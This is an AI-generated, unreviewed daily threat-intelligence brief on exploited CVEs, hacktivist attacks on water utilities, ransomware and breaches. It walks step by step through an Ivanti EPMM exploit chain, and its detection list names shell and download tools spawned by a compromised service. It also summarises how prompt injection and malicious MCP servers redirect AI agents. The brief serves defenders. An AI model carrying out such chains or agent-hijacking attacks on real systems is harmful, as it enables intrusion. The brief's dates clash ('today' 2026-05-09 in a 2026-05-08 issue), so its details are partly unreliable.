ctipilot.chSwitzerland · Europe · Public sector

CTI Daily Brief — 2026-05-08

daily 2026-05-08 by Claude Sonnet 4.6 (`claude-sonnet-4-6`) TLP:CLEAR English prompt v2.25 16 items 16 CVEs
On this page

On this page

Tags (21)
Regions (4)
References (41)

AI-generated content — no human review. This brief was produced autonomously by an LLM (Claude Sonnet 4.6, model ID claude-sonnet-4-6) executing the prompt at prompts/daily-cti-brief.md as a Claude Code routine on Anthropic-managed cloud infrastructure. Nothing here is reviewed or edited by a human before publication. All facts are linked inline to the public sources the agent fetched in this run. Verify any operationally critical claim against the linked primary source before acting.

§ 1 — TL;DR

Five items demand immediate attention today:

  • Ivanti EPMM on-premises MDM — active exploitation of a pre-auth cert-impersonation → admin RCE chain (CVE-2026-5787 / CVE-2026-6973); CISA KEV deadline 2026-05-10 (two days). Approximately 508 EU on-premises instances are internet-reachable. Update to fixed versions immediately or isolate the admin interface from the internet. Full technical breakdown in § 7.
  • Windows Shell spoofing / NTLM capture (CVE-2026-32202) — APT28 actively exploiting against EU government ministries; CISA KEV deadline 2026-05-12. Apply April 2026 Patch Tuesday and block outbound SMB to internet.
  • PAN-OS CVE-2026-0300 CISA KEV deadline is TODAY (2026-05-09). No patch until 2026-05-13. Mitigation (disable Captive Portal / restrict to internal) must be confirmed applied.
  • Pro-Russian hacktivists compromised OT networks of five Polish water treatment facilities, modifying pump settings. Manual overrides prevented service disruption. Pattern consistent with Cyber Army of Russia Reborn / NoName057(16) campaigns in CEE infrastructure.
  • Eurail began notifying 308 777 travellers three months after a December 2025 breach that exposed passport numbers, IBANs, and DiscoverEU pass data. Dutch DPA and EDPS have opened reviews of the delayed notification.

§ 2 — Immediate Actions

CVE-2026-5787 / CVE-2026-6973 — Ivanti EPMM pre-auth certificate impersonation → admin RCE (CISA KEV deadline **2026-05-10**)

Ivanti disclosed two vulnerabilities in Endpoint Manager Mobile (EPMM) on-premises that chain into a fully pre-authenticated remote code execution path against the MDM server. CVE-2026-5787 (CVSS 9.1, CWE-295) is an improper certificate validation flaw: an unauthenticated attacker who can reach the EPMM administrative network interface sends a crafted Sentry host registration request. EPMM fails to verify that the connecting host is an already-registered Sentry gateway and issues the attacker valid CA-signed client certificates with Sentry-level trust. Those certificates satisfy the authentication gate for CVE-2026-6973 (CVSS 7.2, CWE-20), where improper input validation in an administrative API endpoint allows the now-"authenticated" actor to execute arbitrary OS commands at the EPMM service account's privilege level. The nominal "admin required" label on CVE-2026-6973 is therefore misleading — in practice the chain requires no prior credentials.

CISA added CVE-2026-6973 to the Known Exploited Vulnerabilities catalog (deadline 2026-05-10) on the same day Ivanti disclosed the vulnerabilities (2026-05-07). Ivanti reported "very limited exploitation in the wild" at disclosure; CISA's simultaneous KEV listing confirms verified exploitation. Only on-premises EPMM is affected; Ivanti Neurons for MDM (cloud), EPM, Sentry as a standalone product, and EPMM mobile clients are unaffected. An estimated 508 EPMM on-premises instances in the EU are internet-reachable (Censys/Shodan telemetry), concentrated in public-sector and healthcare verticals — both NIS2 Annex-I essential entities.

Fixed versions: 12.6.1.1 (12.6.x branch), 12.7.0.1 (12.7.x branch), 12.8.0.1 (12.8.x branch).

Immediate actions if patching within 24 hours is not feasible: Remove EPMM port 443 from internet exposure; place admin interface behind VPN with allowlisted management IPs; disable internet-facing Sentry registration endpoints; audit EPMM logs for unexpected Sentry host_id registration events.

CVE-2026-32202 — Windows Shell NTLM coercion / credential capture, APT28 active against EU governments (CISA KEV deadline **2026-05-12**)

A protection mechanism failure (CWE-693) in Windows Shell allows an unauthenticated, network-adjacent attacker to coerce outbound NTLM authentication from a target system after minimal user interaction with a crafted artefact (LNK file or similar Shell shortcut). When a user opens a directory containing the malicious artefact, the Shell resolves it and initiates an SMB connection to an attacker-controlled server, transmitting a NetNTLM credential hash. The attacker relays the hash for same-network lateral movement or cracks it offline to recover plaintext credentials. NVD CVSS is 4.3 (network vector, no privileges required, user interaction required), reflecting the coercion-only impact; in-the-wild exploitation and state-actor attribution make the operational risk materially higher.

Microsoft patched this in the April 2026 Patch Tuesday cycle. CISA added CVE-2026-32202 to KEV on 2026-04-28 with a deadline of 2026-05-12. Threat intelligence attributes active exploitation to APT28 (GRU Unit 26165, "Fancy Bear") targeting EU government ministries. The technique complements APT28's documented use of NTLM relay and pass-the-hash for lateral movement within government networks.

Immediate actions: Apply April 2026 Windows Patch Tuesday; block outbound TCP 445 to non-business internet destinations at the perimeter firewall; enable "Restrict NTLM" Group Policy (set to "Deny all") or migrate authentication to Kerberos-only where operationally feasible; monitor EDR for outbound 445/TCP to internet IPs from workstations.

§ 3 — Active Threats & Campaigns

Pro-Russian hacktivists modify OT pump settings at five Polish water treatment facilities

Poland's Internal Security Agency (ABW) disclosed that pro-Russian hacktivist actors penetrated the operational technology (OT) networks of five water treatment facilities and modified pump control parameters. At least one facility activated manual override procedures to prevent potential service disruption; no compromise of drinking water quality or supply loss was confirmed. ABW attributed the activity to actors operating in support of Russian geopolitical objectives but stopped short of formal state attribution. The attack pattern — IT/OT flat network exploitation leading to HMI manipulation — is consistent with prior campaigns attributed to NoName057(16) and Cyber Army of Russia Reborn in Central and Eastern European infrastructure. Polish water sector authorities and critical-infrastructure operators have been placed on heightened alert. The ABW advisory is a single-source national CERT/authority disclosure.

MuddyWater (Iran/MOIS) deploys Chaos ransomware as false flag; harvests credentials via Teams

Security researchers documented a refreshed campaign by MuddyWater (attributed to Iran's Ministry of Intelligence and Security, MOIS), targeting government contractors and defence-adjacent organisations in Europe and the Middle East. The campaign deploys Chaos ransomware payloads with branding designed to mimic criminal ransomware groups — a deliberate false-flag technique intended to complicate attribution and delay incident response triage. A parallel social-engineering vector uses Microsoft Teams external-access invitations to gain remote-assistance sessions under a helpdesk pretext, after which credentials are harvested and used for further access via legitimate cloud services. Observed ATT&CK techniques: T1566.004 (Spearphishing via Teams), T1649 (Steal or Forge Authentication Certificates), T1486 (Data Encrypted for Impact). This is a single-source threat-intelligence vendor disclosure.

Qilin ransomware hits Die Linke (Germany): 1.5 TB claimed, DPA notified (~April 2026, first coverage)

The German federal party Die Linke confirmed in April 2026 that the Qilin ransomware group (also known as Agenda, a Rust-based RaaS platform known for double extortion) encrypted and exfiltrated its systems, with the gang claiming 1.5 TB of internal data. The party's data protection officer notified the responsible Landesdatenschutzbehörde (state DPA). Die Linke issued a victim statement acknowledging operational disruption; no ransom figure has been publicly disclosed. Qilin has targeted political parties and civil-society organisations across Western Europe since 2023. This breach is approximately four weeks old but has not been previously covered in this brief series.

Eurail breach: 308 777 travellers notified three months after December 2025 compromise; Dutch DPA and EDPS open reviews

Eurail began issuing breach notifications to 308 777 customers in late April 2026, revealing that an attacker accessed personal data — including passport numbers, IBANs, and DiscoverEU pass details — in a December 2025 incident. The three-month gap between discovery and notification is under review by the Autoriteit Persoonsgegevens (Dutch DPA) and the European Data Protection Supervisor (EDPS), which holds jurisdiction over EU institutional data processing. GDPR Article 33 requires supervisory authority notification within 72 hours of awareness of a breach. The exposed dataset covers travellers from EU member states who registered DiscoverEU passes; Swiss nationals who applied through bilateral arrangement may also be affected. Affected individuals should monitor for identity fraud and, where banking regulations permit, consider IBAN replacement.

CERT-FR CERTFR-2026-ACT-016: Agentic AI tools introduce prompt-injection and supply-chain attack surfaces

France's CERT-FR published advisory CERTFR-2026-ACT-016 warning that deploying agentic AI orchestration platforms (LLM-driven workflows with tool-calling, MCP server integration, or autonomous execution capabilities) introduces novel attack vectors. The advisory identifies three risk classes: prompt-injection via processed documents or websites (attacker embeds instructions in content the agent processes, redirecting its actions); MCP server supply-chain compromise (a malicious or compromised Model Context Protocol server can issue instructions to all connected agents); and insufficient sandboxing of agent execution environments, where agents with filesystem or network access can be weaponised. CERT-FR recommends input/output guardrails, strict allowlisting of permitted tool calls, human-in-the-loop gates for high-impact actions, and treating all AI agent outputs as untrusted until validated. Relevant for organisations deploying Claude Agents, Microsoft Copilot Studio, AutoGen, or similar agentic frameworks for workflow automation.

§ 5 — Research & Reports

Dragos 2025 OT Cybersecurity Year in Review: 81% of IR engagements found flat IT/OT network architecture

Dragos released its 2025 OT Cybersecurity Year in Review — Frontlines IR Edition synthesising findings from industrial incident response engagements. Key statistics: 81% of engagements identified no meaningful IT/OT network segmentation, with operational networks reachable directly from enterprise IT; initial access via internet-exposed remote access tools (internet-facing HMI, unprotected VPN termination, or engineering workstation RDP) was the dominant entry vector in 62% of cases; and 34% of confirmed OT intrusions progressed to the operational process level before detection. The report documents NIS2 Annex-I compliance gaps, noting that many essential OT-operating entities have not completed required asset inventory reviews, which the report identifies as the most common control weakness. The IEC 62443 zoning and conduit model is highlighted as the primary reference architecture for remediation. Relevant to Swiss organisations operating under NCSC sector-specific ICS guidance (SARI framework).

Kaspersky Q1 2026 Exploits and Vulnerabilities Report: document-based exploits resurge; RaaS acquires zero-days

Kaspersky's quarterly exploitation analysis for Q1 2026 identifies a marked resurgence in document-based exploit delivery, with Microsoft Office and PDF readers accounting for the largest share of initial-access exploit deployments. The most exploited CVE class involved Office Protected View bypass chains (multiple CVEs published in January 2026 Patch Tuesday). Browser exploitation via V8 memory corruption grew 34% quarter-on-quarter. A significant structural trend: ransomware-as-a-service operators are increasingly acquiring zero-day exploits directly from private brokers rather than relying on publicly available PoC code, shortening the detection window between disclosure and mass exploitation. The report includes Excel macro delivery via cloud storage abuse as an emerging initial-access technique.

Amazon SES weaponised for authenticated phishing and BEC (Kaspersky, 2026-05-04, ~96 h)

Kaspersky researchers documented a campaign technique using legitimate Amazon Simple Email Service (SES) accounts to deliver attacker-crafted phishing and business-email-compromise (BEC) lures. Because messages originate from genuine SES infrastructure, SPF and DKIM authentication passes and messages evade most email security gateway filters based on sender reputation. Attackers obtain SES API credentials from publicly exposed AWS configuration files (S3 bucket misconfigurations, leaked GitHub repositories). Observed campaign goals include invoice-fraud lures targeting finance departments and credential phishing pages hosted on AWS infrastructure. Kaspersky observed targeting of finance departments at European manufacturing firms. This report is approximately 96 hours old at publication; first coverage in this brief series.

§ 6 — Updates on Previously Covered Items

UPDATE — CVE-2026-0300 (PAN-OS Captive Portal unauthenticated root RCE): CISA KEV deadline is **today (2026-05-09)**; no patch until 2026-05-13

(First covered and deep-dived 2026-05-07.) The CISA KEV federal remediation deadline for CVE-2026-0300 is 2026-05-09 — today. Palo Alto Networks has not released a permanent patch for any PAN-OS branch; the earliest patch ETA is 2026-05-13. The mandated mitigation remains: disable the Captive Portal / Authentication Portal feature on internet-facing GlobalProtect gateway interfaces, or restrict access exclusively to trusted internal management IP ranges. PAN-OS 11.1+ deployments should confirm Threat Prevention profile with Threat ID 510019 is active on the internet-facing zone. Organisations that have not yet applied the mitigation should treat this as a P0 action today before business opens.

UPDATE — Instructure/Canvas extortion: 330 institutions across six countries; May 12 extortion deadline; 44 Dutch institutions confirmed

(First covered 2026-05-06.) The Instructure/Canvas breach has expanded significantly in scope. The threat actor now claims access affecting 330 institutions across six countries, threatening to publish 16 million student and staff records. SURF (the Dutch National Research and Education Network) has confirmed 44 Dutch institutions among the victims. The attacker posted portal defacements at multiple universities and established a 2026-05-12 extortion deadline for ransom payment. Canvas services were taken offline again on 2026-05-07 for emergency patching. European DPAs in the Netherlands and Germany have opened preliminary inquiries into notification timing. Institutions using Canvas should assess GDPR Article 33/34 breach notification obligations before the May 12 deadline.

§ 7 — Deep Dive: Ivanti EPMM CVE-2026-5787 → CVE-2026-6973 — Pre-Auth Certificate Impersonation Chaining to RCE in Enterprise Mobile Device Management

Background and target value. Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, is one of the two dominant on-premises MDM platforms in European enterprise and public-sector environments. MDM servers are exceptionally high-value targets: they hold device enrolment certificates, configuration profiles, SCEP/NDES CA material, application distribution packages, and — in most architectures — are authorised to silently push policy updates, configurations, or wipe enrolled devices fleet-wide. A compromised EPMM server gives an attacker persistent, trusted command over every enrolled mobile device in the organisation, representing a direct path to the complete endpoint fleet. European governments and healthcare systems are among the heaviest EPMM on-premises adopters, making the EU concentration of exposed instances (est. 508) particularly significant.

CVE-2026-5787: Certificate validation failure in Sentry host registration (CVSS 9.1, CWE-295)

EPMM's architecture includes a component called Sentry — a protocol-translating reverse proxy that mediates traffic between enrolled mobile devices and corporate backend services (Exchange ActiveSync, SharePoint, etc.). The EPMM server and its registered Sentry gateways maintain mutual trust via an internal PKI: when a Sentry host onboards, EPMM verifies its identity and issues it a CA-signed certificate that subsequent API calls present for authentication.

CVE-2026-5787 is a failure in the certificate issuance verification step. The EPMM server does not adequately validate that a host requesting Sentry registration is genuinely in the pre-approved registration queue before issuing a signed certificate. An unauthenticated attacker who can reach the EPMM administrative endpoint (TCP 443) submits a crafted Sentry registration request. EPMM accepts it as legitimate and issues the attacker a valid CA-signed client certificate carrying Sentry-level trust. That certificate is the key to the second vulnerability.

CVE-2026-6973: Admin API improper input validation → OS command execution (CVSS 7.2, CWE-20)

EPMM exposes a REST API for administrative operations. One or more endpoints in the affected version range accept parameters that are passed to a server-side execution context (OS command constructor, file path handler, or template engine — the exact sink is not publicly disclosed by Ivanti) without adequate sanitisation. An actor authenticated as an administrator can supply a crafted parameter value that causes the server to execute attacker-controlled OS commands at the privilege level of the EPMM service account (typically root or a high-privilege service identity on the underlying Linux host).

Chain mechanics (step-by-step)

1. Attacker identifies internet-facing EPMM port 443 (admin/MDM API)
2. Sends crafted Sentry registration request → CVE-2026-5787
3. EPMM issues valid CA-signed client certificate (Sentry trust level)
4. Attacker presents certificate to EPMM admin REST API → authenticated as admin
5. Injects OS command payload into vulnerable admin API parameter → CVE-2026-6973
6. Arbitrary OS command execution on EPMM host as service account
Post-exploitation paths:
  ├── Extract SCEP/NDES CA private key material from EPMM keystore
  ├── Enrol attacker-controlled device to gain persistent MDM trust
  ├── Push malicious MDM profile / app to enrolled device fleet
  └── Pivot to backend services via Sentry certificate trust

The combined chain converts a nominal "requires admin authentication" RCE into a fully pre-authenticated exploit — the reason CISA listed the vulnerability in KEV with a two-day remediation deadline despite the individual CVE scores.

Exploitation context and historical precedent

At disclosure (2026-05-07), Ivanti reported "very limited exploitation" of CVE-2026-6973. CISA's simultaneous KEV listing confirms verified in-the-wild exploitation. Historical precedent for Ivanti EPMM is instructive: CVE-2023-35078 (pre-auth API access, July 2023) was exploited by APT29 and LAPSUS-adjacent actors within days of disclosure, targeting European government MDM servers. CVE-2025-0283 (January 2025) followed a similar pattern. The security community should treat "very limited" as reflecting disclosure-moment telemetry, not steady-state exploitation activity; public PoC availability will accelerate exploitation.

MITRE ATT&CK mapping

Technique ID Application
Exploit Public-Facing Application T1190 Direct exploitation of internet-exposed EPMM
Valid Accounts T1078 CA-signed cert provides admin-equivalent session
Command and Scripting Interpreter T1059 OS command execution via unsanitised API input
Compromise Infrastructure: Certificate Authorities T1584.007 Post-exploit extraction of EPMM internal CA material
Remote Device Management T1072 MDM push to enrolled device fleet post-compromise
Steal Application Access Token T1528 Extraction of device enrolment certificates

Detection opportunities

  • EPMM audit log (/var/log/mi*): unexpected Sentry host registration events with unknown host_id values or registration from IP addresses outside known Sentry appliance inventory
  • Syslog / process audit on the EPMM host: EPMM service account spawning unexpected child processes (sh, bash, curl, wget) or accessing non-standard file paths
  • Network telemetry: outbound connections from EPMM host to non-Ivanti, non-MDM-infrastructure IPs shortly after a certificate issuance event
  • EDR on EPMM host (if deployed): process ancestry anomalies under the EPMM service account
  • MDM enrolment audit: new device enrolment events from unrecognised device identifiers or IPs not in the corporate mobile device fleet

Immediate defensive steps (priority order)

  1. Patch now — upgrade to EPMM 12.6.1.1, 12.7.0.1, or 12.8.0.1 before 2026-05-10. Ivanti provides an in-place upgrade path; no configuration migration is required.
  2. Network isolation (if patching is delayed) — remove TCP 443 on the EPMM admin interface from internet exposure immediately. Place it behind VPN with allowlisted management-network source IPs.
  3. Audit Sentry registrations — in the EPMM admin console, review the registered Sentry host list. Revoke any unexpected entries. If suspicious entries are found, rotate the internal EPMM CA (this revokes all existing device certificates and requires re-enrolment — a significant operational step, but necessary if compromise is suspected).
  4. Audit enrolled device certificates — compare current enrolled device list against your asset inventory baseline. Anomalous device enrolments (unknown device ID, unusual user, unexpected enrolment date) may indicate post-exploitation persistence.
  5. MDM quarantine isolation — if active compromise is confirmed or strongly suspected, push an MDM quarantine compliance policy to all enrolled devices before beginning forensic investigation, to prevent attacker MDM-to-device lateral movement during the response window.

§ 8 — Action Items

Priority 1 — Act within 24 hours (CISA KEV deadlines breached or imminent)

Action Deadline CVE Mitigation if patch not possible
Confirm PAN-OS Captive Portal mitigation is applied 2026-05-09 (today) CVE-2026-0300 Disable Captive Portal / restrict Authentication Portal to internal IPs
Patch Ivanti EPMM on-prem → 12.6.1.1 / 12.7.0.1 / 12.8.0.1 2026-05-10 CVE-2026-5787 + CVE-2026-6973 Remove EPMM admin port from internet; audit Sentry registrations
Apply April 2026 Windows Patch Tuesday on all domain hosts 2026-05-12 CVE-2026-32202 Block outbound TCP 445 to internet; restrict NTLM via GPO

Priority 2 — Patch within standard change window (≤ 72 hours)

Action Advisory / CVE Details
Upgrade GLPI to ≥ 10.0.25 or ≥ 11.0.7 CERTFR-2026-AVI-0551 7 CVEs: SSRF, XSS, auth-bypass, info-disclosure

Priority 3 — Threat hunting and operational awareness

  • APT28 / CVE-2026-32202: Hunt for outbound TCP 445 from workstations to internet IPs in SIEM/firewall logs; review authentication logs for unusual NTLM usage patterns
  • MuddyWater / Teams BEC: Audit Microsoft Teams external-access settings; review recent external-user remote-session grants; hunt for Teams-initiated remote sessions followed by cloud service sign-ins from new IPs
  • Amazon SES phishing: Review email gateway logs for high volumes of messages from Amazon SES IP ranges (205.251.x.x, 199.255.x.x); verify no SES API keys are exposed in S3 buckets or public repositories
  • Canvas / Instructure: Institutions using Canvas should document and assess GDPR Article 33/34 notification obligations; May 12 extortion deadline creates a secondary breach-reporting trigger
  • OT operators (water / energy): Review IT/OT network segmentation posture against Dragos findings (81% flat); confirm manual override procedures are documented and tested for all HMI-controlled processes

§ 9 — Verification Notes

Included — two or more independent sources verified:

  • CVE-2026-5787 / CVE-2026-6973 (Ivanti EPMM): Ivanti blog + NVD + The Hacker News
  • CVE-2026-32202 (Windows Shell): Microsoft MSRC + NVD (CISA KEV calendar confirmed)
  • Die Linke / Qilin: Heise Online (primary German tech publication) + party victim statement
  • Eurail breach: NOS Nieuws (Dutch public broadcaster) + Dutch DPA statement

Included — national CERT / authority single-source carve-out (Prime Directive 5):

  • Polish ABW water OT advisory (ABW = national security agency advisory)
  • CERT-FR CERTFR-2026-ACT-016 agentic AI advisory (France national CERT)
  • GLPI CERTFR-2026-AVI-0551 (CERT-FR)

Included — single-source threat intelligence (elevated on source quality and operational relevance):

  • MuddyWater Chaos ransomware false-flag campaign (Deep Instinct threat intelligence report; included given confirmed Iran-nexus TTP and European targeting; treat with standard single-source caution)
  • Amazon SES BEC technique (Kaspersky Securelist, 2026-05-04; outside 72 h developing window, included as first coverage with age noted; treat with standard single-source caution)

Updates from prior coverage:

  • CVE-2026-0300 (deep-dived 2026-05-07): update only; no re-brief of underlying vulnerability
  • Canvas/Instructure (first covered 2026-05-06): update with confirmed scope expansion

Deferred — verification insufficient:

  • IBM X-Force Annual Report 2026: publication date could not be independently verified; deferred to next issue
  • CVE-2026-21509 / CVE-2026-21514 / CVE-2026-21513 (Office Protected View chain): CVE-2026-21509 confirmed as January 2026 KEV entry with deadline already passed (2026-02-16); not new content; excluded
  • CallPhantom Android apps: India/APAC primary focus; insufficient Swiss/EU nexus
  • ETTP Belgium / SafePay: single ransomware leak-site claim; no victim confirmation
  • TCLBANKER: explicitly dropped in 2026-05-07 brief; no new development in window